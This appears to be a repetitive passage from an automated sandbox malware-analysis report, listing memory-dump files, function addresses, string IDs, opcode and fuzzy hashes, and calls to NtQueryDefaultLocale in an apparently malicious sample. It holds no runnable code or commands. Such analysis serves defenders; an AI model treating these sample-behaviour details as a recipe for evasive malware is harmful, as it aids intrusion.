                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: dd5746110b1573a81b88755b8d08bcbb8b13f04083addce36d5c7d2b50690713
                                                                                                      • Instruction ID: 800be2fe017bd6cec6b1ed1deb2e8dbe0577fdc1cc1ba76656c9ed1218cf5c7c
                                                                                                      • Opcode Fuzzy Hash: dd5746110b1573a81b88755b8d08bcbb8b13f04083addce36d5c7d2b50690713
                                                                                                      • Instruction Fuzzy Hash: D4F1F2B1D052689EF7208A24DC84BEA7775FB90314F0440FAD84DA6281E73D9EC6CF66
                                                                                                      Function 0040D19C Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 411COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-2907935017
                                                                                                      • Opcode ID: 3e20ac1b042d064c917b3c8d981fb16b81d1eb18493b357f075ae41f120fe25f
                                                                                                      • Instruction ID: fa72119971fe1738a16423913855ad517ac07880d40edb0efa1c2e548e6b9999
                                                                                                      • Opcode Fuzzy Hash: 3e20ac1b042d064c917b3c8d981fb16b81d1eb18493b357f075ae41f120fe25f
                                                                                                      • Instruction Fuzzy Hash: E5F1D0B1D042689AE7208B64DC84BEAB775FF50314F0580FAD84DA7281E73D9EC58F66
                                                                                                      Function 0040D1A2 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 411COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-2907935017
                                                                                                      • Opcode ID: 6e2b80dc035aa1716cf42ab3f9f2bf99b9a861d74d87f63ea8086b5478a36799
                                                                                                      • Instruction ID: 0a5257a9b04ff75c523d06e981317f2a732ec068ff376e5ba3e891763f354bcc
                                                                                                      • Opcode Fuzzy Hash: 6e2b80dc035aa1716cf42ab3f9f2bf99b9a861d74d87f63ea8086b5478a36799
                                                                                                      • Instruction Fuzzy Hash: A0F1D0B1D042689AE7208B64DC84BEAB775FF50314F0580FAD84DA7281E73D9EC58F66
                                                                                                      Function 0040D197 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 410COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-2907935017
                                                                                                      • Opcode ID: cb4f3510fec6df52bacc8eeab9674ffe9cfa078f33c42537ced916828098ee13
                                                                                                      • Instruction ID: d88acccd999b1dd8125beb93581fe64fabc83e35470882dc57bdc027088589db
                                                                                                      • Opcode Fuzzy Hash: cb4f3510fec6df52bacc8eeab9674ffe9cfa078f33c42537ced916828098ee13
                                                                                                      • Instruction Fuzzy Hash: 75F1E0B1D042689AE7208B64DC84BEAB775FF50314F0580FAD84DA7281E73D9EC58F66
                                                                                                      Function 0040D308 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 408nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: cc0f457c328ba3249793b3b294189bee344953cce17f4246190cf49d1de6354d
                                                                                                      • Instruction ID: 008b81451a8c14e01e4211732afc75b6bc2e698b04e91ac08cafabe82d532a53
                                                                                                      • Opcode Fuzzy Hash: cc0f457c328ba3249793b3b294189bee344953cce17f4246190cf49d1de6354d
                                                                                                      • Instruction Fuzzy Hash: E1F1E2B1D042688BE7208A64DC94BEAB775FF51304F1140FAD84D9B281E73D9EC68F66
                                                                                                      Function 004160C4 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 404COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-2907935017
                                                                                                      • Opcode ID: a392cc62dda066828459020c65c6ddd53e0865a06d3f90fa9c9173f80103aa38
                                                                                                      • Instruction ID: c55892c3dbc1c7878a975b33e70700338ad43240fb9f80cd0e3c6526c037379b
                                                                                                      • Opcode Fuzzy Hash: a392cc62dda066828459020c65c6ddd53e0865a06d3f90fa9c9173f80103aa38
                                                                                                      • Instruction Fuzzy Hash: ABF1F3B1D056688AE7208B24DC44BEAB775FF90304F0180FAD84DA6281E77D5ED1CF66
                                                                                                      Function 0040D0F2 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 399nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: e81f127cc87718080479e4e937bb3b922198d775f28c1ce0aabdbc6779310551
                                                                                                      • Instruction ID: 86d09fb828b49ac19bd170460641619a7ec5e522faa4c3b58b4300dc7a050f19
                                                                                                      • Opcode Fuzzy Hash: e81f127cc87718080479e4e937bb3b922198d775f28c1ce0aabdbc6779310551
                                                                                                      • Instruction Fuzzy Hash: FCE1F1B1D042688AF7208A64DC94BEAB775FF50304F1140FAD84D9A281E73D9EC6CF66
                                                                                                      Function 0040D216 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 386COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-2907935017
                                                                                                      • Opcode ID: 799a31a66fa3c1b030b98039dfc73e8c5d98346e9421660e5a9bddf89ffcb4be
                                                                                                      • Instruction ID: e6043b2917edb75790d9d75bb3daf73bca92432f0512283564d95b6b8d2dc3cb
                                                                                                      • Opcode Fuzzy Hash: 799a31a66fa3c1b030b98039dfc73e8c5d98346e9421660e5a9bddf89ffcb4be
                                                                                                      • Instruction Fuzzy Hash: BEE102B1D042689AF7208A24DC84BEAB775FF50314F0540FAD84DAA281E73D9ED5CF66
                                                                                                      Function 0040D30D Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 371nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: c3481579432331c519753886f4b208a6b345d3130d9f60d368c34b0753353101
                                                                                                      • Instruction ID: 3a9b9be455e648e2dd087a9fd8e12fc71907b3b10191f3d628a5e8ba9e461db8
                                                                                                      • Opcode Fuzzy Hash: c3481579432331c519753886f4b208a6b345d3130d9f60d368c34b0753353101
                                                                                                      • Instruction Fuzzy Hash: F3E1E2B1D052688AF7208A24DC84BEABB75FF90304F1540FAD84D5A281D73D9EC6CF66
                                                                                                      Function 00415D06 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 362nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 5d76ec3c3c2111bf28778894e09b3a58c524885ff347f414fd75d9418cdc901d
                                                                                                      • Instruction ID: dee64e3fe69b035f014206e9496741a7ad4b72090371bf9f257424549b7b1473
                                                                                                      • Opcode Fuzzy Hash: 5d76ec3c3c2111bf28778894e09b3a58c524885ff347f414fd75d9418cdc901d
                                                                                                      • Instruction Fuzzy Hash: 07D1E1B1D046688EF7208B24DC94BEA77B5FF90314F0480FAD84D96281E77D5EC68B66
                                                                                                      Function 0040D0E3 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 360COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
